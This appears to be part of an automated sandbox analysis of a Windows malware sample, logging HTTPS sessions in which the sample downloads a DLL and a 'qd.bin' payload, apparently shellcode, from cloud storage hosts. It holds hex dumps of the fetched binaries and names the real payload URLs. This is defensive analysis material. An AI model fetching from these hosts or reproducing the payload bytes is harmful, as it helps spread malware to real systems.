                                                            2024-07-25 15:09:57 UTC8184INData Raw: 9f 68 01 00 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68
                                                            Data Ascii: h]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
                                                            2024-07-25 15:09:57 UTC8184INData Raw: 00 00 8d 4d a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60
                                                            Data Ascii: Ms3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
                                                            2024-07-25 15:09:57 UTC16368INData Raw: 50 89 7e 54 89 7e 58 e8 9c e9 ff ff 89 7e 5c 83 4d fc ff 8b 4d e8 85 c9 74 14 8b 11 8d 45 d8 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 89 7d e8 85 f6 74 06 8d be e0 00 00 00 89 be 30 01 00 00 e8 09 e9 02 00 c2 08 00 55 8b ec 56 8b f1 e8 c0 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 43 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d4 3f 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 15 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 6a 04 b8 80 c8 03 10 e8 96 e8 02 00 8b f1 89 75 f0 c7 06 38 42 00 10 83 65 fc 00 eb 0d 6a 00 8b ce e8 87 4a 00 00 84 c0 74 0b 8b ce e8 d8 4a 00 00 84 c0 74 e8 8b ce
                                                            Data Ascii: P~T~X~\MMtE;PR}t0UVEtV,Y^]UEVxCtV,Y^]UEV?tV,Y^]UVEtV,Y^]ju8BejJtJt
                                                            2024-07-25 15:09:58 UTC8184INData Raw: 0e 8b 49 04 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83
                                                            Data Ascii: IL18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.
                                                            2024-07-25 15:09:58 UTC8184INData Raw: 66 83 39 00 75 05 33 c0 40 5d c3 6a 02 58 5d c3 a9 ff 7f ff ff 75 0a 66 83 39 00 75 04 33 c0 5d c3 33 c0 66 85 d2 0f 95 c0 83 e8 02 5d c3 55 8b ec 8b 45 08 83 c0 02 5d c3 55 8b ec 51 56 8b 75 08 d9 06 dc 1d 50 12 00 10 df e0 d9 ee f6 c4 05 0f 8b 0c 01 00 00 d9 45 0c dd e1 df e0 f6 c4 44 0f 8b fa 00 00 00 d9 06 dc 1d 40 12 00 10 df e0 f6 c4 41 75 12 dd d9 33 c0 dd d8 40 d9 05 00 31 06 10 e9 dd 00 00 00 d9 06 dc 0d 20 12 00 10 d9 5d 08 d9 45 08 d8 d2 df e0 dd da f6 c4 05 7a 08 d9 05 48 12 00 10 eb 06 d9 05 18 12 00 10 d9 5d 08 d9 45 08 de c2 d9 c9 e8 33 84 02 00 0f b7 c8 0f bf c1 89 45 08 db 45 08 d9 5d 08 d9 06 d9 45 08 dd 05 a0 11 00 10 d8 c9 de ea dc 0d 10 12 00 10 de e9 d9 5d 08 d9 05 30 31 06 10 d9 c0 d9 e0 d9 45 08 d8 d1 df e0 dd d9 f6 c4 41 75 0f d8
                                                            Data Ascii: f9u3@]jX]uf9u3]3f]UE]UQVuPED@Au3@1 ]EzH]E3EE]E]01EAu
                                                            2024-07-25 15:09:58 UTC16368INData Raw: 04 85 db 74 47 3b f8 7f 0b 7c 04 3b f3 73 05 8b de 89 7d 10 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff
                                                            Data Ascii: tG;|;s}tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVH


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.54972282.156.94.474435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:10:00 UTC137OUTGET /zf_cef.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0
                                                            Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:10:01 UTC477INHTTP/1.1 200 OK
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 219584
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:10:01 GMT
                                                            ETag: "e864fe41a4fedec386a65cb456ca3066"
                                                            Last-Modified: Thu, 21 Mar 2024 19:42:27 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 14474361187052609782
                                                            x-cos-request-id: NjZhMjZhYzlfYTYzMDkyMWVfMTUzNTlfMWYyOWRmNg==
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:10:01 UTC15907INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 c4 f3 f5 4c a5 9d a6 4c a5 9d a6 4c a5 9d a6 45 dd 0e a6 46 a5 9d a6 8e 24 98 a7 5c a5 9d a6 8e 24 99 a7 46 a5 9d a6 8e 24 9e a7 4e a5 9d a6 8e 24 9c a7 48 a5 9d a6 07 dd 9c a7 49 a5 9d a6 4c a5 9c a6 2a a5 9d a6 bf 27 98 a7 4d a5 9d a6 bf 27 9d a7 4d a5 9d a6 bf 27 62 a6 4d a5 9d a6 bf 27 9f a7 4d a5 9d a6 52 69 63 68 4c a5 9d a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$LLLEF$\$F$N$HIL*'M'M'bM'MRichLPEL
                                                            2024-07-25 15:10:01 UTC8188INData Raw: 68 70 a2 02 10 8b 4d 08 e8 b0 da ff ff 68 70 a2 02 10 8b 4d 08 e8 a3 da ff ff 68 70 a2 02 10 8b 4d 08 e8 96 da ff ff 68 70 a2 02 10 8b 4d 08 e8 89 da ff ff 68 70 a2 02 10 8b 4d 08 e8 7c da ff ff 68 70 a2 02 10 8b 4d 08 e8 6f da ff ff 68 70 a2 02 10 8b 4d 08 e8 62 da ff ff 68 70 a2 02 10 8b 4d 08 e8 55 da ff ff 68 70 a2 02 10 8b 4d 08 e8 48 da ff ff 68 70 a2 02 10 8b 4d 08 e8 3b da ff ff 68 70 a2 02 10 8b 4d 08 e8 2e da ff ff 68 b4 a2 02 10 8b 4d 08 e8 21 da ff ff 68 70 a2 02 10 8b 4d 08 e8 14 da ff ff 68 70 a2 02 10 8b 4d 08 e8 07 da ff ff 68 b4 a2 02 10 8b 4d 08 e8 fa d9 ff ff 68 34 a4 02 10 8b 4d 08 e8 ed d9 ff ff 68 80 a3 02 10 8b 4d 08 e8 e0 d9 ff ff 68 ec a3 02 10 8b 4d 08 e8 d3 d9 ff ff 68 ec a6 02 10 8b 4d 08 e8 c6 d9 ff ff 68 8c a3 02 10 8b 4d 08
                                                            Data Ascii: hpMhpMhpMhpMhpM|hpMohpMbhpMUhpMHhpM;hpM.hM!hpMhpMhMh4MhMhMhMhM
                                                            2024-07-25 15:10:01 UTC8184INData Raw: ff ff 68 1c a8 02 10 8b 4d 08 e8 b2 ba ff ff 68 d4 a8 02 10 8b 4d 08 e8 a5 ba ff ff 68 68 a7 02 10 8b 4d 08 e8 98 ba ff ff 68 ec a3 02 10 8b 4d 08 e8 8b ba ff ff 68 c8 a5 02 10 8b 4d 08 e8 7e ba ff ff 68 70 a2 02 10 8b 4d 08 e8 71 ba ff ff 68 68 a7 02 10 8b 4d 08 e8 64 ba ff ff 68 e4 a8 02 10 8b 4d 08 e8 57 ba ff ff 68 a4 a2 02 10 8b 4d 08 e8 4a ba ff ff 68 f0 a8 02 10 8b 4d 08 e8 3d ba ff ff 68 70 a2 02 10 8b 4d 08 e8 30 ba ff ff 68 0c a6 02 10 8b 4d 08 e8 23 ba ff ff 68 70 a2 02 10 8b 4d 08 e8 16 ba ff ff 68 78 a5 02 10 8b 4d 08 e8 09 ba ff ff 68 fc a8 02 10 8b 4d 08 e8 fc b9 ff ff 68 f0 a5 02 10 8b 4d 08 e8 ef b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 e2 b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 d5 b9 ff ff 68 70 a2 02 10 8b 4d 08 e8 c8 b9 ff ff 68 0c a9 02 10 8b
                                                            Data Ascii: hMhMhhMhMhM~hpMqhhMdhMWhMJhM=hpM0hM#hpMhxMhMhMhpMhpMhpMh
                                                            2024-07-25 15:10:01 UTC8184INData Raw: 8b 4d 08 e8 c1 9a ff ff 68 68 a7 02 10 8b 4d 08 e8 b4 9a ff ff 68 34 ab 02 10 8b 4d 08 e8 a7 9a ff ff 68 70 a8 02 10 8b 4d 08 e8 9a 9a ff ff 68 1c a7 02 10 8b 4d 08 e8 8d 9a ff ff 68 48 a7 02 10 8b 4d 08 e8 80 9a ff ff 68 ec a3 02 10 8b 4d 08 e8 73 9a ff ff 68 fc a7 02 10 8b 4d 08 e8 66 9a ff ff 68 10 a7 02 10 8b 4d 08 e8 59 9a ff ff 68 a8 aa 02 10 8b 4d 08 e8 4c 9a ff ff 68 88 a7 02 10 8b 4d 08 e8 3f 9a ff ff 68 f8 a3 02 10 8b 4d 08 e8 32 9a ff ff 68 38 aa 02 10 8b 4d 08 e8 25 9a ff ff 68 0c a9 02 10 8b 4d 08 e8 18 9a ff ff 68 ac a5 02 10 8b 4d 08 e8 0b 9a ff ff 68 c8 a5 02 10 8b 4d 08 e8 fe 99 ff ff 68 60 a9 02 10 8b 4d 08 e8 f1 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 e4 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 d7 99 ff ff 68 94 a2 02 10 8b 4d 08 e8 ca 99 ff ff
                                                            Data Ascii: MhhMh4MhpMhMhHMhMshMfhMYhMLhM?hM2h8M%hMhMhMh`MhMhMhM
                                                            2024-07-25 15:10:01 UTC8184INData Raw: ff 68 94 a2 02 10 8b 4d 08 e8 c3 7a ff ff 68 94 a2 02 10 8b 4d 08 e8 b6 7a ff ff 68 94 a2 02 10 8b 4d 08 e8 a9 7a ff ff 68 48 a7 02 10 8b 4d 08 e8 9c 7a ff ff 68 10 aa 02 10 8b 4d 08 e8 8f 7a ff ff 68 88 a2 02 10 8b 4d 08 e8 82 7a ff ff 68 68 a7 02 10 8b 4d 08 e8 75 7a ff ff 68 b8 a6 02 10 8b 4d 08 e8 68 7a ff ff 68 58 a4 02 10 8b 4d 08 e8 5b 7a ff ff 68 88 a7 02 10 8b 4d 08 e8 4e 7a ff ff 68 10 aa 02 10 8b 4d 08 e8 41 7a ff ff 68 88 a2 02 10 8b 4d 08 e8 34 7a ff ff 68 fc a7 02 10 8b 4d 08 e8 27 7a ff ff 68 d4 a8 02 10 8b 4d 08 e8 1a 7a ff ff 68 94 a2 02 10 8b 4d 08 e8 0d 7a ff ff 68 94 a2 02 10 8b 4d 08 e8 00 7a ff ff 68 94 a2 02 10 8b 4d 08 e8 f3 79 ff ff 68 48 a7 02 10 8b 4d 08 e8 e6 79 ff ff 68 10 aa 02 10 8b 4d 08 e8 d9 79 ff ff 68 88 a2 02 10 8b 4d
                                                            Data Ascii: hMzhMzhMzhHMzhMzhMzhhMuzhMhzhXM[zhMNzhMAzhM4zhM'zhMzhMzhMzhMyhHMyhMyhM
                                                            2024-07-25 15:10:01 UTC8184INData Raw: 4d 08 e8 d2 5a ff ff 68 c8 a5 02 10 8b 4d 08 e8 c5 5a ff ff 68 60 a9 02 10 8b 4d 08 e8 b8 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 ab 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 9e 5a ff ff 68 94 a2 02 10 8b 4d 08 e8 91 5a ff ff 68 58 a5 02 10 8b 4d 08 e8 84 5a ff ff 68 c0 a2 02 10 8b 4d 08 e8 77 5a ff ff 68 50 a8 02 10 8b 4d 08 e8 6a 5a ff ff 68 d8 a2 02 10 8b 4d 08 e8 5d 5a ff ff 68 48 a7 02 10 8b 4d 08 e8 50 5a ff ff 68 ac a5 02 10 8b 4d 08 e8 43 5a ff ff 68 58 a7 02 10 8b 4d 08 e8 36 5a ff ff 68 48 a7 02 10 8b 4d 08 e8 29 5a ff ff 68 70 a2 02 10 8b 4d 08 e8 1c 5a ff ff 68 10 a7 02 10 8b 4d 08 e8 0f 5a ff ff 68 f4 a9 02 10 8b 4d 08 e8 02 5a ff ff 68 7c ab 02 10 8b 4d 08 e8 f5 59 ff ff 68 64 ab 02 10 8b 4d 08 e8 e8 59 ff ff 68 3c a5 02 10 8b 4d 08 e8 db 59 ff ff 68
                                                            Data Ascii: MZhMZh`MZhMZhMZhMZhXMZhMwZhPMjZhM]ZhHMPZhMCZhXM6ZhHM)ZhpMZhMZhMZh|MYhdMYh<MYh
                                                            2024-07-25 15:10:01 UTC8184INData Raw: 68 70 a2 02 10 8b 4d 08 e8 d4 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 c7 3a ff ff 68 3c a7 02 10 8b 4d 08 e8 ba 3a ff ff 68 48 a7 02 10 8b 4d 08 e8 ad 3a ff ff 68 58 a7 02 10 8b 4d 08 e8 a0 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 93 3a ff ff 68 24 a6 02 10 8b 4d 08 e8 86 3a ff ff 68 10 a5 02 10 8b 4d 08 e8 79 3a ff ff 68 f0 a8 02 10 8b 4d 08 e8 6c 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 5f 3a ff ff 68 0c a6 02 10 8b 4d 08 e8 52 3a ff ff 68 70 a2 02 10 8b 4d 08 e8 45 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 38 3a ff ff 68 58 a7 02 10 8b 4d 08 e8 2b 3a ff ff 68 58 a4 02 10 8b 4d 08 e8 1e 3a ff ff 68 68 a7 02 10 8b 4d 08 e8 11 3a ff ff 68 40 a4 02 10 8b 4d 08 e8 04 3a ff ff 68 a0 a5 02 10 8b 4d 08 e8 f7 39 ff ff 68 ac a6 02 10 8b 4d 08 e8 ea 39 ff ff 68 70 a2 02 10 8b 4d 08
                                                            Data Ascii: hpM:hpM:h<M:hHM:hXM:hhM:h$M:hMy:hMl:hpM_:hMR:hpME:hhM8:hXM+:hXM:hhM:h@M:hM9hM9hpM
                                                            2024-07-25 15:10:01 UTC8184INData Raw: 08 e8 e3 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 d6 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 c9 1a ff ff 68 d0 a6 02 10 8b 4d 08 e8 bc 1a ff ff 68 f4 a9 02 10 8b 4d 08 e8 af 1a ff ff 68 1c a7 02 10 8b 4d 08 e8 a2 1a ff ff 68 a8 ae 02 10 8b 4d 08 e8 95 1a ff ff 68 0c a6 02 10 8b 4d 08 e8 88 1a ff ff 68 b8 a6 02 10 8b 4d 08 e8 7b 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 6e 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 61 1a ff ff 68 f8 a3 02 10 8b 4d 08 e8 54 1a ff ff 68 04 a5 02 10 8b 4d 08 e8 47 1a ff ff 68 a4 a2 02 10 8b 4d 08 e8 3a 1a ff ff 68 80 ae 02 10 8b 4d 08 e8 2d 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 20 1a ff ff 68 70 a2 02 10 8b 4d 08 e8 13 1a ff ff 68 d0 a6 02 10 8b 4d 08 e8 06 1a ff ff 68 f4 a9 02 10 8b 4d 08 e8 f9 19 ff ff 68 1c a7 02 10 8b 4d 08 e8 ec 19 ff ff 68 a8
                                                            Data Ascii: hpMhpMhMhMhMhMhMhM{hpMnhpMahMThMGhM:hM-hpM hpMhMhMhMh
                                                            2024-07-25 15:10:01 UTC8184INData Raw: 70 a2 02 10 8b 4d 08 e8 e5 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 d8 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 cb fa fe ff 68 70 a2 02 10 8b 4d 08 e8 be fa fe ff 68 d8 a2 02 10 8b 4d 08 e8 b1 fa fe ff 68 b8 a5 02 10 8b 4d 08 e8 a4 fa fe ff 68 c8 a5 02 10 8b 4d 08 e8 97 fa fe ff 68 ec a3 02 10 8b 4d 08 e8 8a fa fe ff 68 70 a2 02 10 8b 4d 08 e8 7d fa fe ff 68 70 a2 02 10 8b 4d 08 e8 70 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 63 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 56 fa fe ff 68 40 a4 02 10 8b 4d 08 e8 49 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 3c fa fe ff 68 70 a2 02 10 8b 4d 08 e8 2f fa fe ff 68 70 a2 02 10 8b 4d 08 e8 22 fa fe ff 68 b4 a2 02 10 8b 4d 08 e8 15 fa fe ff 68 20 a5 02 10 8b 4d 08 e8 08 fa fe ff 68 70 a2 02 10 8b 4d 08 e8 fb f9 fe ff 68 70 a2 02 10 8b 4d 08 e8
                                                            Data Ascii: pMhpMhpMhpMhMhMhMhMhpM}hpMphpMchpMVh@MIhpM<hpM/hpM"hMh MhpMhpM
                                                            2024-07-25 15:10:01 UTC16368INData Raw: e8 f4 da fe ff 68 70 a2 02 10 8b 4d 08 e8 e7 da fe ff 68 70 a2 02 10 8b 4d 08 e8 da da fe ff 68 34 a4 02 10 8b 4d 08 e8 cd da fe ff 68 84 a6 02 10 8b 4d 08 e8 c0 da fe ff 68 28 a4 02 10 8b 4d 08 e8 b3 da fe ff 68 a4 a3 02 10 8b 4d 08 e8 a6 da fe ff 68 d4 a3 02 10 8b 4d 08 e8 99 da fe ff 68 a4 a3 02 10 8b 4d 08 e8 8c da fe ff 68 58 a4 02 10 8b 4d 08 e8 7f da fe ff 68 84 a6 02 10 8b 4d 08 e8 72 da fe ff 68 70 a2 02 10 8b 4d 08 e8 65 da fe ff 68 70 a2 02 10 8b 4d 08 e8 58 da fe ff 68 70 a2 02 10 8b 4d 08 e8 4b da fe ff 68 70 a2 02 10 8b 4d 08 e8 3e da fe ff 68 60 a2 02 10 8b 4d 08 e8 31 da fe ff 68 24 a6 02 10 8b 4d 08 e8 24 da fe ff 68 70 a2 02 10 8b 4d 08 e8 17 da fe ff 68 70 a2 02 10 8b 4d 08 e8 0a da fe ff 68 30 a6 02 10 8b 4d 08 e8 fd d9 fe ff 68 ac a4
                                                            Data Ascii: hpMhpMh4MhMh(MhMhMhMhXMhMrhpMehpMXhpMKhpM>h`M1h$M$hpMhpMh0Mh


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.54972343.153.232.1524435780C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-07-25 15:10:07 UTC123OUTGET /qd.bin HTTP/1.1
                                                            User-Agent: loader
                                                            Host: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
                                                            Cache-Control: no-cache
                                                            2024-07-25 15:10:07 UTC472INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 40917
                                                            Connection: close
                                                            Accept-Ranges: bytes
                                                            Content-Disposition: attachment
                                                            Date: Thu, 25 Jul 2024 15:10:07 GMT
                                                            ETag: "8aa72f47438eebd6fe0e8c94bd206ca8"
                                                            Last-Modified: Fri, 22 Mar 2024 10:42:51 GMT
                                                            Server: tencent-cos
                                                            x-cos-force-download: true
                                                            x-cos-hash-crc64ecma: 16559786720377567833
                                                            x-cos-request-id: NjZhMjZhY2ZfZjM3NWI3MDlfMTVmZjVfNjZkOTJk
                                                            x-cos-server-side-encryption: AES256
                                                            2024-07-25 15:10:07 UTC15912INData Raw: e8 c0 3d 00 00 c0 3d 00 00 60 39 6a c7 6b d8 0f c3 35 70 44 3f 1e 51 17 cf c5 f3 22 c1 66 20 37 e5 8c 68 07 12 1d b6 d8 9e 00 00 00 00 7d 5d 27 be b3 34 0c 4e 56 13 68 33 16 74 3e f3 b0 51 72 6f ab e4 d6 a1 ad 1f 95 81 42 81 27 22 12 69 b6 b7 a9 78 d1 38 9e 9a 52 58 b3 4b 37 10 d8 dd af 66 8f 6d 34 92 ff c7 2b ee 39 57 21 ad 46 a7 12 b3 d7 ac c8 36 f7 d8 01 66 1a b8 6c 36 db f9 c7 51 c9 66 51 e6 88 d2 81 3d 9d 46 25 79 13 0b 3d c8 00 48 e9 ee 63 df 7d 8c e2 78 7d 12 f9 cc e7 e2 3a b5 45 22 9f 22 ef cd 04 f0 68 c2 1c bf 9e de c2 f5 93 7e 28 d0 6b 05 a2 8b 3e 42 c2 15 6e 73 97 44 e1 03 ce 11 9c 00 18 43 db ec f8 ff 1d 71 b6 0a b3 3e 2b 43 51 30 05 82 14 02 56 81 73 fe 0f d5 13 d8 75 a3 7d b8 a0 26 49 de 2a 38 5f b5 21 06 3e 14 b3 3d 28 e2 3b 94 00 09 9a 2e
                                                            Data Ascii: ==`9jk5pD?Q"f 7h}]'4NVh3t>QroB'"ix8RXK7fm4+9W!F6fl6QfQ=F%y=Hc}x}:E""h~(k>BnsDCq>+CQ0Vsu}&I*8_!>=(;.
                                                            2024-07-25 15:10:07 UTC8188INData Raw: 20 4c 8b cb 33 d2 33 c9 ff d0 4c 8b 43 28 48 8b cb 48 8b 93 08 02 00 00 48 8b f8 e8 fc 2d 00 00 4c 8b 43 28 48 8b cb 48 8b 93 a0 00 00 00 4c 8b f0 e8 e6 2d 00 00 4c 8b 43 28 48 8b cb 48 8b 93 a8 00 00 00 48 8b f0 e8 d0 2d 00 00 33 c9 48 8b e8 ff 53 40 4c 8b f8 4d 85 f6 74 4f 48 85 f6 74 4a 48 85 ed 74 45 c7 44 24 60 0b 00 10 00 ff d5 48 8b c8 48 8d 54 24 30 ff d6 8b 83 38 02 00 00 48 8d 4c 24 30 48 83 a4 24 c8 00 00 00 f0 49 03 c7 33 d2 48 89 84 24 28 01 00 00 41 ff d6 eb 0b 48 83 c8 ff eb 08 e8 c9 12 00 00 48 8b c7 4c 8d 9c 24 00 05 00 00 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5f 41 5e 5f c3 cc f0 ff 41 08 8b 41 08 c3 b8 01 40 00 80 c3 cc cc 4d 85 c0 75 06 b8 03 40 00 80 c3 4c 8b 49 10 49 8b 81 30 08 00 00 48 3b 02 75 0d 49 8b 81 38 08 00 00 48
                                                            Data Ascii: L33LC(HHH-LC(HHL-LC(HHH-3HS@LMtOHtJHtED$`HHT$08HL$0H$I3H$(AHHL$I[ Ik(Is0IA_A^_AA@Mu@LII0H;uI8H
                                                            2024-07-25 15:10:07 UTC8184INData Raw: 33 c9 4d 8d 44 24 02 49 8b d5 48 8b ce e8 66 0c 00 00 49 89 07 48 83 c7 08 4c 8b 85 28 03 00 00 49 83 c7 08 eb a1 48 83 c3 14 33 ff 39 7b 0c 0f 85 6e ff ff ff 4c 8b 75 88 4c 8b ad 18 03 00 00 4c 8b 64 24 78 41 8b 84 24 f0 00 00 00 85 c0 0f 84 86 00 00 00 48 8d 78 04 49 03 f8 8b 07 85 c0 74 77 8b d0 48 8b ce 49 03 d0 e8 21 0b 00 00 4c 8b 85 28 03 00 00 4c 8b e0 33 c0 4d 85 e4 74 4a 8b 5f 0c 44 8b 7f 08 49 03 d8 4d 03 f8 eb 33 79 08 44 8b 0b 4c 8b c0 eb 0a 49 83 c0 02 44 8b c8 4c 03 c1 49 8b d4 48 8b ce e8 ca 0b 00 00 49 89 07 48 83 c3 08 4c 8b 85 28 03 00 00 49 83 c7 08 33 c0 48 8b 0b 48 85 c9 75 c5 48 83 c7 20 8b 07 85 c0 75 8e 4c 8b 64 24 78 33 ff 45 8b 64 24 28 48 8d 4d a0 b8 02 00 00 00 4d 03 e0 4c 89 65 80 8d 50 7e 41 0f 10 06 41 0f 10 4e 10 0f 11 01
                                                            Data Ascii: 3MD$IHfIHL(IH39{nLuLLd$xA$HxItwHI!L(L3MtJ_DIM3yDLIDLIHIHL(I3HHuH uLd$x3Ed$(HMMLeP~AAN
